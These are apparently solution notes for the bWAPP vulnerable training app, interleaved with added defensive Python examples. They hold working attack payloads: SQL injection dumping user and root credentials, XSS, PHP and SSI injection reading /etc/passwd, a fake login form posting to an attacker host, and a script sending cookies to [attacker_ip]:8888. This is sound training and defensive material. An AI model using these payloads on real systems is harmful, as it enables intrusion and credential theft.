In-progress rough solutions. This is not a comprehensive solution list. Updating whenever I have the time.
Reference sheets:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
htmli_get.php
/bWAPP/htmli_get.php?firstname=%3Ch1%3EHello%3C%2Fh1%3E&lastname=%3Ch2%3EWorld%3C%2Fh2%3E&form=submit
<h1>Hello</h1>
<h2>World</h2>
XXX: Todo, IE only?
/bWAPP/htmli_current_url.php
Following solution taken from:
http://penthusiasts.blogspot.com/2013/12/bwapp-html-injection-all.html
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://AttackerIP/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
Attacker's machine:
nc -l 80
/bWAPP/phpi.php?message=a;echo "what"; $fp = fopen("/etc/passwd","r");$result = fread($fp,8192); echo $result
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="cat /etc/passwd" -->
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
/bWAPP/sqli_6.php
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
Use Burp
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
Use Burp
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
a%' UNION ALL SELECT 1, column_name, null, null, null, null, null from information_schema.columns where table_name="users";--
blah%' union all select 1,login,password,email,secret,1, 1 from users --
ok' or 1=1--
a%' UNION ALL SELECT 1,sqlite_version(),1,1,1,1; --
Be sure to add a space after the -- for this one; otherwise the injection will not work.
asdf',(SELECT database() ))--
To begin enumerating tables:
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 0,1 ))--
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 1,1 ))--
asdf',(select password from mysql.user where user='root' ))--
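Added example (not from these notes or from bWAPP): the mechanism behind the UNION payloads above, reproduced against an in-memory SQLite database. The movies table, its rows and column names are constructed; the payload is the SQLite one from above, with the semicolon dropped. The vulnerable search pastes the term into the SQL text, so the quote closes the LIKE literal and the UNION appends a row the table never held; the parameterised search binds the whole term as one value.

```python
import sqlite3

# Constructed sample data: a six-column table standing in for the
# application's own movies table, so the UNION must also supply six columns.
MOVIES = [
    (1, "Iron Man", 2008, "action", "Tony Stark", "tt0371746"),
    (2, "The Incredible Hulk", 2008, "action", "Bruce Banner", "tt0800080"),
    (3, "Gattaca", 1997, "sci-fi", "Vincent Freeman", "tt0119177"),
]

# SQLite payload from the notes above (semicolon removed; the trailing
# comment swallows the closing quote the application appends).
UNION_PAYLOAD = "a%' UNION ALL SELECT 1,sqlite_version(),1,1,1,1 -- "


def make_db():
    """Build an in-memory SQLite database holding the constructed table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movies (id INTEGER, title TEXT, release_year INTEGER, "
        "genre TEXT, main_character TEXT, imdb TEXT)"
    )
    conn.executemany("INSERT INTO movies VALUES (?,?,?,?,?,?)", MOVIES)
    return conn


def search_vulnerable(conn, term):
    """String-concatenated query: the term becomes part of the SQL text."""
    sql = "SELECT * FROM movies WHERE title LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Parameterised query: the term, quotes and all, is bound as one value
    and can only ever be compared against titles."""
    sql = "SELECT * FROM movies WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def leaked_version(rows):
    """Return the database version string if the UNION row reached the
    result set (it lands in the title column), otherwise None."""
    for row in rows:
        if row[1] == sqlite3.sqlite_version:
            return row[1]
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable query leaked:", leaked_version(search_vulnerable(db, UNION_PAYLOAD)))
    print("parameterised query rows:", len(search_safe(db, UNION_PAYLOAD)))
```

Binding fixes the statement structure, but the LIKE metacharacters % and _ in the bound value still act as wildcards; a search feature that cares about that escapes them and adds an ESCAPE clause, which is a separate concern from the injection shown here.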
Using Burp, do not allow the web page to load captcha_box.php: that page sets the server's session variable $_SESSION["captcha"], which would then require a check on ba_captcha_bypass.php. The second requirement is to prevent captcha_user from being submitted by the client. Eliminate it using Burp:
POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bepp:8088/bWAPP/ba_captcha_bypass.php
Cookie: PHPSESSID=67a6abb1d7ff40c55ad50d3aa43fc7c4; security_level=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

login=bee&password=bug&form=submit
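Added example (not from these notes or from bWAPP): the two conditions of the bypass above, modelled as server-side checks. check_flawed is my reconstruction of a check that only verifies when both the session value and the client field exist; it is an assumption about the shape of the bug, not bWAPP's code. check_hardened fails closed: no outstanding challenge or no answer means no login, and the challenge is consumed on first use. The session and form dictionaries are constructed from the request shown.

```python
import secrets


class CaptchaError(Exception):
    """Raised by the hardened check whenever the captcha cannot be verified."""


def check_flawed(session, form):
    """Reconstruction (assumption, not bWAPP's code) of a check that only
    verifies when both sides supplied a value. Returns True when the login
    may proceed, so a missing session captcha or a dropped captcha_user
    field skips verification entirely."""
    if "captcha" in session and "captcha_user" in form:
        return form["captcha_user"] == session["captcha"]
    return True


def check_hardened(session, form):
    """Fail-closed check: the server must have issued a challenge, the client
    must answer it, the answer must match, and the challenge is single-use."""
    expected = session.pop("captcha", None)   # consumed whether or not it matches
    answer = form.get("captcha_user")
    if expected is None or answer is None:
        raise CaptchaError("no captcha challenge outstanding or no answer supplied")
    if not secrets.compare_digest(str(answer).encode(), str(expected).encode()):
        raise CaptchaError("captcha answer does not match")
    return True


def login_attempt(check, session, form):
    """Run one login attempt through the given captcha check and report
    whether the credentials would be processed at all."""
    try:
        return bool(check(session, form))
    except CaptchaError:
        return False


# Constructed state mirroring the bypass: captcha_box.php was never loaded,
# so the session has no captcha, and captcha_user is absent from the POST.
BYPASS_SESSION = {"security_level": "0"}
BYPASS_FORM = {"login": "bee", "password": "bug", "form": "submit"}


if __name__ == "__main__":
    print("flawed check lets the bypass through:",
          login_attempt(check_flawed, dict(BYPASS_SESSION), dict(BYPASS_FORM)))
    print("hardened check lets the bypass through:",
          login_attempt(check_hardened, dict(BYPASS_SESSION), dict(BYPASS_FORM)))
```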
xss_get.php
<script>alert(document.cookie)</script>
xss_post.php
<script>alert(document.cookie)</script>
Use Burp to unhide hidden fields or intercept POST param.
Change 'login' and 'secret' field to arbitrary values.
POST /bWAPP/xxe-2.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=UTF-8
Referer: http://bepp:8088/bWAPP/insecure_direct_object_ref_3.php
Content-Length: 59
Cookie: PHPSESSID=77aa634b546d1c78d5afc16aae328172; security_level=0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<reset><login>bee</login><secret>Any bugs?</secret></reset>
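Added example (not from these notes or from bWAPP): a handler for the reset body above that refuses any document carrying a DOCTYPE before it reaches the parser. Entities can only be declared inside a DOCTYPE, so this gate closes off XXE independently of the XML library's own entity defaults. RESET_BODY is the request body from the notes; DTD_BODY is constructed with an inert internal entity purely to exercise the rejection path.

```python
import re
import xml.etree.ElementTree as ET

# Request body from the notes above.
RESET_BODY = "<reset><login>bee</login><secret>Any bugs?</secret></reset>"

# Constructed body with a DTD; the entity is a harmless literal and exists
# only to show that any DOCTYPE is refused.
DTD_BODY = '<!DOCTYPE reset [<!ENTITY greet "hello">]><reset><login>&greet;</login></reset>'

_DOCTYPE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


class RejectedXml(ValueError):
    """Raised when a request body is refused before or during parsing."""


def parse_reset(body):
    """Parse the <reset> body only if it declares no DTD, then pull out the
    two expected child elements and nothing else."""
    if _DOCTYPE.search(body):
        raise RejectedXml("DOCTYPE declarations are not accepted")
    root = ET.fromstring(body)
    if root.tag != "reset":
        raise RejectedXml(f"unexpected root element {root.tag!r}")
    login = root.findtext("login")
    secret = root.findtext("secret")
    if login is None or secret is None:
        raise RejectedXml("login and secret are both required")
    return {"login": login, "secret": secret}


def handle(body):
    """Return the parsed fields, or None when the body was rejected."""
    try:
        return parse_reset(body)
    except (RejectedXml, ET.ParseError):
        return None


if __name__ == "__main__":
    print("normal body:", handle(RESET_BODY))
    print("body with DTD:", handle(DTD_BODY))
```

The DOCTYPE scan is deliberately blunt: a body that mentions the string inside a comment or CDATA section is also refused, which is the right failure direction for an endpoint that never needs a DTD.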
bWAPP/insecure_direct_object_ref_2.php
Use Burp to unhide the hidden ticket price field, or use the proxy to modify the POST param while in transit.
Doesn't work on modern browsers, as there are security enforcements. Maybe use PhantomJS?
I modified the POC to use GET instead of TRACE. Additional changes from original xst.js include making the onreadystatechange NOT inline (seems to play better with FF).
- Start listener on attacking machine: nc -l 8888
- Modify xst.js to match your environment:
var xmlhttp;
var xmlResp;   // declared explicitly instead of being created as an implicit global
// Code for IE7+, Firefox, Chrome, Opera, Safari
if (window.XMLHttpRequest)
{
    xmlhttp = new XMLHttpRequest();
}
// Code for IE6, IE5
else
{
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
// Handler assigned by reference rather than inline (plays better with FF)
xmlhttp.onreadystatechange = foo;
function foo()
{
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
    {
        xmlResp = xmlhttp.responseText;
        // document.getElementById("response").innerHTML = xmlResp
        alert(xmlResp);
        // [attacker_ip]:8888 is the listener started above
        document.location = "http://[attacker_ip]:8888/grab.cgi?" + document.cookie;
    }
}
// Original POC used TRACE; changed to GET (see note above)
// xmlhttp.open("TRACE","/bWAPP/",true);
xmlhttp.open("GET", "/bWAPP/", true);
// xmlhttp.withCredentials = true;
xmlhttp.send();
Use Burp to get cookie
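Added defensive example (not from these notes or from bWAPP): the script above only pays off if document.cookie can read the session cookie and the server still answers TRACE. The functions below audit one captured response for both conditions, flagging cookies without HttpOnly or Secure and an Allow header that advertises TRACE. The response text and cookie values are constructed.

```python
# Constructed sample response standing in for what the proxy shows when the
# application sets its cookies. Not captured from bWAPP.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Date: Mon, 01 Jan 2024 00:00:00 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS,TRACE
Set-Cookie: PHPSESSID=0123456789abcdef0123456789abcdef; path=/
Set-Cookie: security_level=0; path=/
Set-Cookie: remember=1; path=/; Secure; HttpOnly
Content-Type: text/html
"""


def parse_headers(raw):
    """Return (name, value) pairs for the header block, names lower-cased;
    repeated headers such as Set-Cookie stay as separate entries."""
    headers = []
    for line in raw.splitlines()[1:]:      # skip the status line
        if not line.strip():
            break                          # blank line ends the header block
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def cookie_findings(headers):
    """Flag each cookie lacking HttpOnly (readable via document.cookie, so a
    TRACE echo or an XSS payload can exfiltrate it) or Secure (sent in clear)."""
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "httponly" not in attrs:
            findings.append((cookie_name, "missing HttpOnly"))
        if "secure" not in attrs:
            findings.append((cookie_name, "missing Secure"))
    return findings


def trace_enabled(headers):
    """True if the server lists TRACE in its Allow header."""
    for name, value in headers:
        if name == "allow":
            methods = {m.strip().upper() for m in value.split(",")}
            if "TRACE" in methods:
                return True
    return False


if __name__ == "__main__":
    hdrs = parse_headers(SAMPLE_RESPONSE)
    for cookie, problem in cookie_findings(hdrs):
        print(f"{cookie}: {problem}")
    print("TRACE advertised:", trace_enabled(hdrs))
```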
Use the heartbleed.py script found in the /evil directory
python heartbleed.py [ip]
directory_traversal_2.php
/bWAPP/directory_traversal_2.php?directory=../../../../home/
directory_traversal_1.php
/bWAPP/directory_traversal_1.php?page=../../../../../etc/passwd
hostheader_1.php
hostheader_2.php
Copy rfi.txt to rfi.php; it appears PHP automatically adds the suffix .php.
bWAPP/rlfi.php?language=../evil/rfi
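Added example (not from these notes or from bWAPP) covering both the directory_traversal_1.php / directory_traversal_2.php entries and the rlfi.php entry above. safe_join resolves a user-supplied path under a fixed base and refuses anything that escapes it, which is the check a file-serving handler needs before open(); resolve_language_include replaces path building from the language parameter with a fixed allow-list, so neither ../ nor a remote location can reach include(). APP_ROOT, DOCS_DIR and the language names are assumed values, not bWAPP's real layout; the check is purely lexical, so it runs without those paths existing.

```python
import os
from pathlib import Path

# Assumed layout; not bWAPP's real paths.
APP_ROOT = Path("/var/www/bwapp")
DOCS_DIR = APP_ROOT / "documents"
LANGUAGES = {"lang_en", "lang_fr", "lang_nl"}   # assumed allow-list of include names


class PathRejected(ValueError):
    """Raised when a user-controlled path leaves the allowed tree."""


def safe_join(base, user_path):
    """Resolve user_path under base and refuse anything that escapes it.
    normpath collapses '..' segments lexically; an absolute user_path replaces
    base entirely when joined, which the containment test then catches."""
    base = Path(base)
    candidate = Path(os.path.normpath(base / user_path))
    if candidate != base and base not in candidate.parents:
        raise PathRejected(f"{user_path!r} escapes {base}")
    return candidate


def check_path(base, user_path):
    """Return the resolved path, or None if it was rejected."""
    try:
        return safe_join(base, user_path)
    except PathRejected:
        return None


def resolve_language_include(language):
    """Map the language parameter onto a fixed allow-list instead of building
    an include path from it. Returns the include path or None."""
    if language not in LANGUAGES:
        return None
    return APP_ROOT / f"{language}.php"


if __name__ == "__main__":
    # The two traversal parameters from the notes above, plus a normal one.
    for p in ("../../../../../etc/passwd", "../../../../home/", "report.txt"):
        print(f"{p!r:32} -> {check_path(DOCS_DIR, p)}")
    for lang in ("lang_en", "../evil/rfi"):
        print(f"{lang!r:32} -> {resolve_language_include(lang)}")
```

A lexical check is enough for the traversal patterns shown here; where the base directory may contain symlinks, resolve the candidate on the real filesystem as well before comparing, since a link inside the tree can point outside it.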